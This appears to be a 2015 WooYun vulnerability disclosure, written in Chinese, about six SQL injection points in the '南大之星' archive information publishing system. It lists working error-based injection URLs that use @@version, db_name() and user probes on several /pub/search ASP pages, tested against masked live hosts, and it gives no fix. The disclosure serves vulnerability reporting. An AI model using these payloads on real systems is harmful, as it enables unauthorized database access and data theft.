当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153651

漏洞标题:南大之星信息发布系统DBA权限SQL注入6枚

相关厂商:南京中坦科技有限公司

漏洞作者: 路人甲

提交时间:2015-11-24 14:39

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-24: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-01-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

大家好,我是通用打包白帽子,主要是针对市面上通用产品漏洞的打包,我的挖通用方式认证研究一个系统漏洞然后一次性打包提交,提交后将不在研究该系统转战下一个系统的漏洞打包!希望通用奖金可以给力加快!谢谢各位!

详细说明:

产品:南大之星信息发布系统
官方产品介绍:
  与“南大之星”档案管理系统不同的是,“南大之星”信息发布系统是一个面向所有用户(包括档案工作人员、各级领导、普通工作人员、社会用户等)的一个系统。“南大之星”信息发布系统将档案管理系统中整理好的数据(包括目录信息、全文、电子文件、扫描图片、视频、音频档案等各种类型的档案数据)通过管理员定制好的“发布策略”以网站的方式向所有用户发布档案信息。通过发布系统的各个定制功能,用户可以不需要任何网站制作方面的专业知识,就可以轻松架设起本单位的 档案门户网站。
SQL Injection:

1、/pub/search/search_video.asp?id=3&mid=4%20and%20@@version>0--&yh=1
2、/pub/search/search_audio.asp?id=3&mid=4%20and%20@@version>0--&yh=1
3、/pub/search/search_audio_view.asp?id=3&mid=4%20and%20@@version>0--&yh=1
4、/pub/search/search_fj.asp??id=3&mid=4%20and%20@@version>0--&yh=1
5、/pub/search/search_video_bc.asp?id=12&mid=1%20and%20@@version>0--&yh=1
6、/pub/search/search_video_view.asp?id=3&mid=4%20and%20@@version>0--&yh=1


Case:

http://**.**.**.**/
http://**.**.**.**/
**.**.**.**/
**.**.**.**:8000/
**.**.**.**/
**.**.**.**/
http://**.**.**.**/
http://**.**.**.**/

漏洞证明:

Security Testing:

1、
http://**.**.**.**/pub/search/search_video.asp?id=3&mid=4%20and%20@@version>0--&yh=1

01.jpg


2、
http://**.**.**.**/pub/search/search_audio.asp?id=3&mid=4%20and%20@@version>0--&yh=1

02.jpg


3、**.**.**.**//pub/search/search_audio_view.asp?id=3&mid=4%20and%20@@version>0--&yh=1

03.jpg


4、**.**.**.**:8000/pub/search/search_fj.asp??id=3&mid=4%20and%20db_name()>0--&yh=1

04.jpg


5、**.**.**.**//pub/search/search_fj.asp??id=3&mid=4%20and%20user>0--&yh=1

05.jpg


6、http://**.**.**.**//pub/search/search_video_view.asp?id=3&mid=4 and @@servername>0--&yh=1

06.jpg

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝